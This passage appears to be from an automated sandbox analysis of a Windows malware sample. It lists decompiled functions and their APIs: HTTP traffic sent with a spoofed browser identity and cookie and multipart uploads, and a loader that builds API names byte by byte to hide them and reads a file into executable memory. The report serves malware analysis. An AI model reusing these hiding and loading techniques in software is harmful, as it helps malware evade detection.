                                                                                                                                                                  0x10021d06
                                                                                                                                                                  0x10021d0f
                                                                                                                                                                  0x10021d33
                                                                                                                                                                  0x10021d38
                                                                                                                                                                  0x10021d38
                                                                                                                                                                  0x10021d0f
                                                                                                                                                                  0x10021d06
                                                                                                                                                                  0x10021d3b
                                                                                                                                                                  0x10021d42
                                                                                                                                                                  0x10021d49
                                                                                                                                                                  0x10021d50
                                                                                                                                                                  0x10021d64
                                                                                                                                                                  0x10021d6a
                                                                                                                                                                  0x10021d71
                                                                                                                                                                  0x100224a7
                                                                                                                                                                  0x100224a7
                                                                                                                                                                  0x100224ab
                                                                                                                                                                  0x100224b1
                                                                                                                                                                  0x100224b1
                                                                                                                                                                  0x100224b7
                                                                                                                                                                  0x100224bb
                                                                                                                                                                  0x100224c1
                                                                                                                                                                  0x100224c1
                                                                                                                                                                  0x100224c7
                                                                                                                                                                  0x100224cb
                                                                                                                                                                  0x100224d1
                                                                                                                                                                  0x100224d1
                                                                                                                                                                  0x100224da
                                                                                                                                                                  0x100224db
                                                                                                                                                                  0x100224e6
                                                                                                                                                                  0x100224e7
                                                                                                                                                                  0x100224f2
                                                                                                                                                                  0x100224f3
                                                                                                                                                                  0x100224fe
                                                                                                                                                                  0x100224ff
                                                                                                                                                                  0x1002250a
                                                                                                                                                                  0x1002250b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022510
                                                                                                                                                                  0x10021d77
                                                                                                                                                                  0x10021d7b
                                                                                                                                                                  0x10021d89
                                                                                                                                                                  0x10021d8c
                                                                                                                                                                  0x10021d96
                                                                                                                                                                  0x10021d99
                                                                                                                                                                  0x10021dac
                                                                                                                                                                  0x10021db5
                                                                                                                                                                  0x10021db6
                                                                                                                                                                  0x10021dbb
                                                                                                                                                                  0x10021dbb
                                                                                                                                                                  0x10021dc3
                                                                                                                                                                  0x10021dc8
                                                                                                                                                                  0x10021dcd
                                                                                                                                                                  0x10021dd7
                                                                                                                                                                  0x10021ddd
                                                                                                                                                                  0x10021de7
                                                                                                                                                                  0x10021def
                                                                                                                                                                  0x10021df5
                                                                                                                                                                  0x10021dfc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10021e02
                                                                                                                                                                  0x10021e0d
                                                                                                                                                                  0x10021e18
                                                                                                                                                                  0x10021e18
                                                                                                                                                                  0x10021e30
                                                                                                                                                                  0x10021e34
                                                                                                                                                                  0x10021e3a
                                                                                                                                                                  0x10021e41
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10021e47
                                                                                                                                                                  0x10021e4b
                                                                                                                                                                  0x10021e4d
                                                                                                                                                                  0x10021e51
                                                                                                                                                                  0x10021e5f
                                                                                                                                                                  0x10021e6e
                                                                                                                                                                  0x10021e89
                                                                                                                                                                  0x10021e92
                                                                                                                                                                  0x10021e93
                                                                                                                                                                  0x10021ea1
                                                                                                                                                                  0x10021ea2
                                                                                                                                                                  0x10021ea7
                                                                                                                                                                  0x10021ea7
                                                                                                                                                                  0x10021e51
                                                                                                                                                                  0x10021eaa
                                                                                                                                                                  0x10021ebf
                                                                                                                                                                  0x10021ece
                                                                                                                                                                  0x10021ed9
                                                                                                                                                                  0x10021ee5
                                                                                                                                                                  0x10021ef4
                                                                                                                                                                  0x10021f0a
                                                                                                                                                                  0x10021f20
                                                                                                                                                                  0x10021f36
                                                                                                                                                                  0x10021f4c
                                                                                                                                                                  0x10021f56
                                                                                                                                                                  0x10021fa2
                                                                                                                                                                  0x10021fa2
                                                                                                                                                                  0x10021fa6
                                                                                                                                                                  0x10021fb8
                                                                                                                                                                  0x10021fbe
                                                                                                                                                                  0x10021fd5
                                                                                                                                                                  0x10021fee
                                                                                                                                                                  0x10022009
                                                                                                                                                                  0x10022023
                                                                                                                                                                  0x1002202f
                                                                                                                                                                  0x10022030
                                                                                                                                                                  0x10022035
                                                                                                                                                                  0x10022035
                                                                                                                                                                  0x1002203b
                                                                                                                                                                  0x10022041
                                                                                                                                                                  0x10022048
                                                                                                                                                                  0x10022068
                                                                                                                                                                  0x1002204a
                                                                                                                                                                  0x1002204a
                                                                                                                                                                  0x10022051
                                                                                                                                                                  0x10022070
                                                                                                                                                                  0x10022087
                                                                                                                                                                  0x1002209b
                                                                                                                                                                  0x100220b4
                                                                                                                                                                  0x100220cf
                                                                                                                                                                  0x100220db
                                                                                                                                                                  0x100220dc
                                                                                                                                                                  0x100220e1
                                                                                                                                                                  0x100220e1
                                                                                                                                                                  0x10022051
                                                                                                                                                                  0x100220fc
                                                                                                                                                                  0x10022102
                                                                                                                                                                  0x10022109
                                                                                                                                                                  0x10022110
                                                                                                                                                                  0x10022114
                                                                                                                                                                  0x10022142
                                                                                                                                                                  0x10022151
                                                                                                                                                                  0x1002215e
                                                                                                                                                                  0x1002218a
                                                                                                                                                                  0x1002218f
                                                                                                                                                                  0x10022192
                                                                                                                                                                  0x10022192
                                                                                                                                                                  0x10022195
                                                                                                                                                                  0x10022199
                                                                                                                                                                  0x100221a9
                                                                                                                                                                  0x1002219b
                                                                                                                                                                  0x1002219e
                                                                                                                                                                  0x1002219e
                                                                                                                                                                  0x100221af
                                                                                                                                                                  0x100221b3
                                                                                                                                                                  0x100221c3
                                                                                                                                                                  0x100221b5
                                                                                                                                                                  0x100221b8
                                                                                                                                                                  0x100221b8
                                                                                                                                                                  0x100221c9
                                                                                                                                                                  0x100221cd
                                                                                                                                                                  0x100221dd
                                                                                                                                                                  0x100221cf
                                                                                                                                                                  0x100221d2
                                                                                                                                                                  0x100221d2
                                                                                                                                                                  0x100221fe
                                                                                                                                                                  0x10022202
                                                                                                                                                                  0x10022208
                                                                                                                                                                  0x1002220b
                                                                                                                                                                  0x1002220f
                                                                                                                                                                  0x10022495
                                                                                                                                                                  0x10022495
                                                                                                                                                                  0x10022499
                                                                                                                                                                  0x1002249e
                                                                                                                                                                  0x1002249f
                                                                                                                                                                  0x100224a4
                                                                                                                                                                  0x100224a4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022215
                                                                                                                                                                  0x1002221b
                                                                                                                                                                  0x10022221
                                                                                                                                                                  0x10022224
                                                                                                                                                                  0x10022228
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002222e
                                                                                                                                                                  0x1002224b
                                                                                                                                                                  0x10022251
                                                                                                                                                                  0x10022257
                                                                                                                                                                  0x1002225a
                                                                                                                                                                  0x10022272
                                                                                                                                                                  0x1002227e
                                                                                                                                                                  0x1002228b
                                                                                                                                                                  0x100222a7
                                                                                                                                                                  0x100222ab
                                                                                                                                                                  0x100222b1
                                                                                                                                                                  0x100222c3
                                                                                                                                                                  0x100222db
                                                                                                                                                                  0x100222e7
                                                                                                                                                                  0x100222ed
                                                                                                                                                                  0x100222fe
                                                                                                                                                                  0x10022303
                                                                                                                                                                  0x10022310
                                                                                                                                                                  0x1002231b
                                                                                                                                                                  0x1002231c
                                                                                                                                                                  0x1002232a
                                                                                                                                                                  0x1002232b
                                                                                                                                                                  0x10022330
                                                                                                                                                                  0x10022330
                                                                                                                                                                  0x10022333
                                                                                                                                                                  0x1002233d
                                                                                                                                                                  0x10022347
                                                                                                                                                                  0x1002234b
                                                                                                                                                                  0x1002248f
                                                                                                                                                                  0x10022492
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022351
                                                                                                                                                                  0x10022351
                                                                                                                                                                  0x10022351
                                                                                                                                                                  0x10022362
                                                                                                                                                                  0x10022366
                                                                                                                                                                  0x1002236c
                                                                                                                                                                  0x1002236e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022389
                                                                                                                                                                  0x10022390
                                                                                                                                                                  0x100223a1
                                                                                                                                                                  0x100223a6
                                                                                                                                                                  0x100223a9
                                                                                                                                                                  0x100223af
                                                                                                                                                                  0x100223b6
                                                                                                                                                                  0x100223dd
                                                                                                                                                                  0x100223e2
                                                                                                                                                                  0x100223f3
                                                                                                                                                                  0x100223fa
                                                                                                                                                                  0x100223fe
                                                                                                                                                                  0x10022404
                                                                                                                                                                  0x10022406
                                                                                                                                                                  0x1002240e
                                                                                                                                                                  0x1002240f
                                                                                                                                                                  0x10022414
                                                                                                                                                                  0x10022419
                                                                                                                                                                  0x10022419
                                                                                                                                                                  0x1002241c
                                                                                                                                                                  0x10022423
                                                                                                                                                                  0x10022439
                                                                                                                                                                  0x10022445
                                                                                                                                                                  0x1002244b
                                                                                                                                                                  0x1002245c
                                                                                                                                                                  0x10022461
                                                                                                                                                                  0x1002246e
                                                                                                                                                                  0x10022479
                                                                                                                                                                  0x1002247a
                                                                                                                                                                  0x1002247f
                                                                                                                                                                  0x10022482
                                                                                                                                                                  0x10022489
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022425
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022423
                                                                                                                                                                  0x100223b8
                                                                                                                                                                  0x100223bd
                                                                                                                                                                  0x100223c2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100223c2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022392
                                                                                                                                                                  0x10022376
                                                                                                                                                                  0x10022377
                                                                                                                                                                  0x1002237c
                                                                                                                                                                  0x10022381
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022381
                                                                                                                                                                  0x1002234b
                                                                                                                                                                  0x10021f58
                                                                                                                                                                  0x10021f58
                                                                                                                                                                  0x10021f73
                                                                                                                                                                  0x10021f9a
                                                                                                                                                                  0x10021f6d
                                                                                                                                                                  0x10021f6d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10021f73
                                                                                                                                                                  0x10021f56
                                                                                                                                                                  0x10021e41

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 100212F0: _memset.LIBCMT ref: 1002140B
                                                                                                                                                                    • Part of subcall function 100212F0: _strlen.LIBCMT ref: 1002144A
                                                                                                                                                                    • Part of subcall function 1001A3D0: _strlen.LIBCMT ref: 1001A3E1
                                                                                                                                                                    • Part of subcall function 1001A3D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3FC
                                                                                                                                                                    • Part of subcall function 1001A3D0: _memset.LIBCMT ref: 1001A426
                                                                                                                                                                    • Part of subcall function 1001A3D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A442
                                                                                                                                                                  • _wcscpy_s.LIBCMT ref: 10021D1E
                                                                                                                                                                  • _wcscpy_s.LIBCMT ref: 10021D33
                                                                                                                                                                  • WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
                                                                                                                                                                  • WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC
                                                                                                                                                                  • WinHttpSetOption.WINHTTP(00000000,00000058,?,00000004), ref: 10021DD7
                                                                                                                                                                  • WinHttpConnect.WINHTTP(00000000,?,00000050,00000000), ref: 10021DEF
                                                                                                                                                                  • WinHttpOpenRequest.WINHTTP(00000000,?,?,HTTP/1.1,00000000,00000000,00000100), ref: 10021E34
                                                                                                                                                                  • WinHttpSetCredentials.WINHTTP(00000000,00000001,00000001,?,?,00000000), ref: 10021E89
                                                                                                                                                                  • WinHttpQueryOption.WINHTTP(00000000,0000001F,00000100,?), ref: 10021EBF
                                                                                                                                                                  • WinHttpSetOption.WINHTTP(00000000,0000001F,00000100,00000004), ref: 10021EF4
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,000000FF,A0000000), ref: 10021F0A
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3,000000FF,A0000000), ref: 10021F20
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,000000FF,A0000000), ref: 10021F36
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,upgrade-insecure-requests: 1,000000FF,A0000000), ref: 10021F4C
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,00000000,000000FF,A0000000), ref: 10021F9A
                                                                                                                                                                  • _memset.LIBCMT ref: 10021FD5
                                                                                                                                                                  • _wcscpy_s.LIBCMT ref: 10021FEE
                                                                                                                                                                  • _wcscat_s.LIBCMT ref: 10022009
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,?,000000FF,A0000000), ref: 10022023
                                                                                                                                                                  • WinHttpAddRequestHeaders.WINHTTP(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,A0000000), ref: 10022068
                                                                                                                                                                    • Part of subcall function 100215A0: _memset.LIBCMT ref: 10021636
                                                                                                                                                                    • Part of subcall function 100215A0: _memset.LIBCMT ref: 10021653
                                                                                                                                                                    • Part of subcall function 100215A0: _memset.LIBCMT ref: 10021670
                                                                                                                                                                    • Part of subcall function 100215A0: _sprintf.LIBCMT ref: 10021692
                                                                                                                                                                    • Part of subcall function 100215A0: _sprintf.LIBCMT ref: 100216AC
                                                                                                                                                                    • Part of subcall function 100215A0: _sprintf.LIBCMT ref: 100216D8
                                                                                                                                                                    • Part of subcall function 100215A0: _strlen.LIBCMT ref: 100216EF
                                                                                                                                                                    • Part of subcall function 100215A0: _strlen.LIBCMT ref: 10021717
                                                                                                                                                                  • WinHttpSetTimeouts.WINHTTP(00000000,0000C350,0000C350,0000C350,0000C350), ref: 100220FC
                                                                                                                                                                  • _memset.LIBCMT ref: 1002215E
                                                                                                                                                                  • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000), ref: 10022202
                                                                                                                                                                  • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 1002221B
                                                                                                                                                                  • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,00000000,?,00000000), ref: 1002224B
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 10022251
                                                                                                                                                                  • _memset.LIBCMT ref: 1002228B
                                                                                                                                                                  • WinHttpQueryHeaders.WINHTTP(00000000,00000016,00000000,?,?,00000000), ref: 100222AB
                                                                                                                                                                  • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 10022366
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 10022370
                                                                                                                                                                  • _printf.LIBCMT ref: 1002237C
                                                                                                                                                                  • WinHttpCloseHandle.WINHTTP(00000000), ref: 100224B1
                                                                                                                                                                  • WinHttpCloseHandle.WINHTTP(00000000), ref: 100224C1
                                                                                                                                                                  • WinHttpCloseHandle.WINHTTP(00000000), ref: 100224D1
                                                                                                                                                                  Strings
                                                                                                                                                                  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 10021F01
                                                                                                                                                                  • Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7, xrefs: 10021F2D
                                                                                                                                                                  • GET, xrefs: 10021D13
                                                                                                                                                                  • upgrade-insecure-requests: 1, xrefs: 10021F43
                                                                                                                                                                  • Content-Type: application/x-www-form-urlencoded, xrefs: 1002205F
                                                                                                                                                                  • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 1002240F
                                                                                                                                                                  • A WinHTTP Example Program/1.0, xrefs: 10021D5F
                                                                                                                                                                  • Out of memory., xrefs: 100223B8
                                                                                                                                                                  • Cookie: , xrefs: 10021FDD
                                                                                                                                                                  • Content-Type: multipart/form-data; boundary=%ws, xrefs: 100220A8
                                                                                                                                                                  • WinHttpQueryDataAvailable failed. Error = %d, xrefs: 10022377
                                                                                                                                                                  • HTTP/1.1, xrefs: 10021E23
                                                                                                                                                                  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3, xrefs: 10021F17
                                                                                                                                                                  • POST, xrefs: 10021D28
                                                                                                                                                                  • P, xrefs: 10021C6E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Http$HeadersRequest$_memset$OptionQuery_strlen$CloseHandle_sprintf_wcscpy_s$ByteCharErrorLastMultiOpenWide$AvailableConnectCredentialsDataReceiveResponseSendTimeouts_printf_wcscat_s
                                                                                                                                                                  • String ID: A WinHTTP Example Program/1.0$Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7$Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=%ws$Cookie: $GET$HTTP/1.1$Out of memory.$P$POST$User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$WinHttpQueryDataAvailable failed. Error = %d$WinHttpQueryDataAvailable failed. Error = %d$upgrade-insecure-requests: 1
                                                                                                                                                                  • API String ID: 2394362766-3430901228
                                                                                                                                                                  • Opcode ID: 8ea9e4dbf02062ba1a9f6b707a678d511401b05b778d796b30c9c46de9909fc9
                                                                                                                                                                  • Instruction ID: 6be37eb72d5cb71702d10a25316398720e60b36711b4d3b8ebfd4143576bc246
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ea9e4dbf02062ba1a9f6b707a678d511401b05b778d796b30c9c46de9909fc9
                                                                                                                                                                  • Instruction Fuzzy Hash: D14227B5D00218EBEB24DFA4DC85FDEB7B5EB48304F508258F609A7281D779AA84CF51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00427348, Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 336filememoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E00427348() {
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				intOrPtr _v62;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				short _v363;
				char _v367;
				char _v371;
				char _v375;
				char _v379;
				char _v380;
				char _v416;
				char _v436;
				char _v442;
				char _v443;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v454;
				char _v455;
				char _v456;
				char _v461;
				char _v462;
				char _v463;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				signed int _t127;
				unsigned int _t128;
				unsigned int _t129;
				char* _t132;
				intOrPtr* _t133;
				void* _t134;
				unsigned int _t140;

				 *_t132 =  *_t133;
				_t129 = _t128 >> 2;
				 *((char*)(_t132 + 1)) =  *((intOrPtr*)(_t133 + 1));
				_t134 = _t133 + 2;
				asm("adc dword [ebp-0x75], 0xffffffec");
				_v436 = 0;
				_v416 = 0;
				_v380 = 0;
				_t127 = 0;
				_v379 = 0;
				_v375 = 0;
				_v371 = 0;
				_v367 = 0;
				_v363 = 0;
				_v361 = 0;
				_v496 = 0x56;
				_v495 = 0x69;
				_v494 = 0x72;
				_v493 = 0x74;
				_v492 = 0x75;
				_v491 = 0x61;
				_v490 = 0x6c;
				_v489 = 0x41;
				while(1) {
					_t129 = _t129 + 1;
					_t140 = _t129;
					_v488 = 0x6c;
					_v487 = 0x6c;
					_v486 = 0x6f;
					_v485 = 0x63;
					_v484 = 0;
					_v456 = 0x56;
					_v455 = 0x69;
					_v454 = 0x72;
					while(_t140 >= 0) {
						asm("invalid");
						_push( *((intOrPtr*)(_t134 + _t127 * 8 - 0x7b)));
						_t127 = _t127 + 1;
						asm("invalid");
						_push(_v62);
						asm("invalid");
						asm("popad");
						_v450 = 0x6c;
						_v449 = 0x50;
						_v448 = 0x72;
						_v447 = 0x6f;
						_v446 = 0x74;
						asm("invalid");
						if(( *(_t134 - 2) & _t127) == 0) {
							continue;
						}
						asm("invalid");
						 *[gs:ebp-0x1b8] = 0x63;
						_v443 = 0x74;
						_v442 = 0;
						_v24 = 0x47;
						_v23 = 0x65;
						_v22 = 0x74;
						_v21 = 0x4d;
						_v20 = 0x6f;
						_v19 = 0x64;
						_v18 = 0x75;
						_v17 = 0x6c;
						_v16 = 0x65;
						_v15 = 0x46;
						_v14 = 0x69;
						_v13 = 0x6c;
						_v12 = 0x65;
						_v11 = 0x4e;
						_v10 = 0x61;
						_v9 = 0x6d;
						_v8 = 0x65;
						_v7 = 0x41;
						_v6 = 0;
						_v472 = 0x43;
						_v471 = 0x72;
						_v470 = 0x65;
						_v469 = 0x61;
						_v468 = 0x74;
						_v467 = 0x65;
						_v466 = 0x46;
						_v465 = 0x69;
						_v464 = 0x6c;
						_v463 = 0x65;
						_v462 = 0x41;
						_v461 = 0;
						_v360 = 0x47;
						_v359 = 0x65;
						_v358 = 0x74;
						_v357 = 0x46;
						_v356 = 0x69;
						_v355 = 0x6c;
						_v354 = 0x65;
						_v353 = 0x53;
						_v352 = 0x69;
						_v351 = 0x7a;
						_v350 = 0x65;
						_v349 = 0;
						_v36 = 0x52;
						_v35 = 0x65;
						_v34 = 0x61;
						_v33 = 0x64;
						_v32 = 0x46;
						_v31 = 0x69;
						_v30 = 0x6c;
						_v29 = 0x65;
						_v28 = 0;
						_v328 = 0x43;
						_v327 = 0x6c;
						_v326 = 0x6f;
						_v325 = 0x73;
						_v324 = 0x65;
						_v323 = 0x48;
						_v322 = 0x61;
						_v321 = 0x6e;
						_v320 = 0x64;
						_v319 = 0x6c;
						_v318 = 0x65;
						_v317 = 0;
						_v348 = 0x47;
						_v347 = 0x65;
						_v346 = 0x74;
						_v345 = 0x4c;
						 *((intOrPtr*)(_t134 + _t127 * 8 - 0x7b)) =  *((intOrPtr*)(_t134 + _t127 * 8 - 0x7b)) - 1;
						asm("lodsb");
						asm("invalid");
						goto ( *((intOrPtr*)(_t129 - 0x3a)));
					}
				}
			}















































































































                                                                                                                                                                  0x0042734c
                                                                                                                                                                  0x00427351
                                                                                                                                                                  0x00427354
                                                                                                                                                                  0x00427357
                                                                                                                                                                  0x0042735a
                                                                                                                                                                  0x00427364
                                                                                                                                                                  0x0042736e
                                                                                                                                                                  0x00427378
                                                                                                                                                                  0x0042737f
                                                                                                                                                                  0x00427381
                                                                                                                                                                  0x00427387
                                                                                                                                                                  0x0042738d
                                                                                                                                                                  0x00427393
                                                                                                                                                                  0x00427399
                                                                                                                                                                  0x004273a0
                                                                                                                                                                  0x004273a6
                                                                                                                                                                  0x004273ad
                                                                                                                                                                  0x004273b4
                                                                                                                                                                  0x004273bb
                                                                                                                                                                  0x004273c2
                                                                                                                                                                  0x004273c9
                                                                                                                                                                  0x004273d0
                                                                                                                                                                  0x004273d7
                                                                                                                                                                  0x004273dd
                                                                                                                                                                  0x004273dd
                                                                                                                                                                  0x004273dd
                                                                                                                                                                  0x004273de
                                                                                                                                                                  0x004273e5
                                                                                                                                                                  0x004273ec
                                                                                                                                                                  0x004273f3
                                                                                                                                                                  0x004273fa
                                                                                                                                                                  0x00427401
                                                                                                                                                                  0x00427408
                                                                                                                                                                  0x0042740f
                                                                                                                                                                  0x00427415
                                                                                                                                                                  0x00427419
                                                                                                                                                                  0x0042741b
                                                                                                                                                                  0x0042741f
                                                                                                                                                                  0x00427420
                                                                                                                                                                  0x00427422
                                                                                                                                                                  0x00427428
                                                                                                                                                                  0x0042742a
                                                                                                                                                                  0x0042742b
                                                                                                                                                                  0x00427432
                                                                                                                                                                  0x00427439
                                                                                                                                                                  0x00427440
                                                                                                                                                                  0x00427447
                                                                                                                                                                  0x0042744b
                                                                                                                                                                  0x0042744d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00427452
                                                                                                                                                                  0x00427454
                                                                                                                                                                  0x0042745c
                                                                                                                                                                  0x00427463
                                                                                                                                                                  0x0042746a
                                                                                                                                                                  0x0042746e
                                                                                                                                                                  0x00427472
                                                                                                                                                                  0x00427476
                                                                                                                                                                  0x0042747a
                                                                                                                                                                  0x0042747e
                                                                                                                                                                  0x00427482
                                                                                                                                                                  0x00427486
                                                                                                                                                                  0x0042748a
                                                                                                                                                                  0x0042748e
                                                                                                                                                                  0x00427492
                                                                                                                                                                  0x00427496
                                                                                                                                                                  0x0042749a
                                                                                                                                                                  0x0042749e
                                                                                                                                                                  0x004274a2
                                                                                                                                                                  0x004274a6
                                                                                                                                                                  0x004274aa
                                                                                                                                                                  0x004274ae
                                                                                                                                                                  0x004274b2
                                                                                                                                                                  0x004274b6
                                                                                                                                                                  0x004274bd
                                                                                                                                                                  0x004274c4
                                                                                                                                                                  0x004274cb
                                                                                                                                                                  0x004274d2
                                                                                                                                                                  0x004274d9
                                                                                                                                                                  0x004274e0
                                                                                                                                                                  0x004274e7
                                                                                                                                                                  0x004274ee
                                                                                                                                                                  0x004274f5
                                                                                                                                                                  0x004274fc
                                                                                                                                                                  0x00427503
                                                                                                                                                                  0x0042750a
                                                                                                                                                                  0x00427511
                                                                                                                                                                  0x00427518
                                                                                                                                                                  0x0042751f
                                                                                                                                                                  0x00427526
                                                                                                                                                                  0x0042752d
                                                                                                                                                                  0x00427534
                                                                                                                                                                  0x0042753b
                                                                                                                                                                  0x00427542
                                                                                                                                                                  0x00427549
                                                                                                                                                                  0x00427550
                                                                                                                                                                  0x00427557
                                                                                                                                                                  0x0042755e
                                                                                                                                                                  0x00427562
                                                                                                                                                                  0x00427566
                                                                                                                                                                  0x0042756a
                                                                                                                                                                  0x0042756e
                                                                                                                                                                  0x00427572
                                                                                                                                                                  0x00427576
                                                                                                                                                                  0x0042757a
                                                                                                                                                                  0x0042757e
                                                                                                                                                                  0x00427582
                                                                                                                                                                  0x00427589
                                                                                                                                                                  0x00427590
                                                                                                                                                                  0x00427597
                                                                                                                                                                  0x0042759e
                                                                                                                                                                  0x004275a5
                                                                                                                                                                  0x004275ac
                                                                                                                                                                  0x004275b3
                                                                                                                                                                  0x004275ba
                                                                                                                                                                  0x004275c1
                                                                                                                                                                  0x004275c8
                                                                                                                                                                  0x004275cf
                                                                                                                                                                  0x004275d6
                                                                                                                                                                  0x004275dd
                                                                                                                                                                  0x004275e4
                                                                                                                                                                  0x004275eb
                                                                                                                                                                  0x004275f0
                                                                                                                                                                  0x004275f4
                                                                                                                                                                  0x004275f5
                                                                                                                                                                  0x004275f7
                                                                                                                                                                  0x004275f7
                                                                                                                                                                  0x00427415

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00427847
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0042787E
                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004278B7
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 004278D0
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 0042790D
                                                                                                                                                                  • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004279A8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
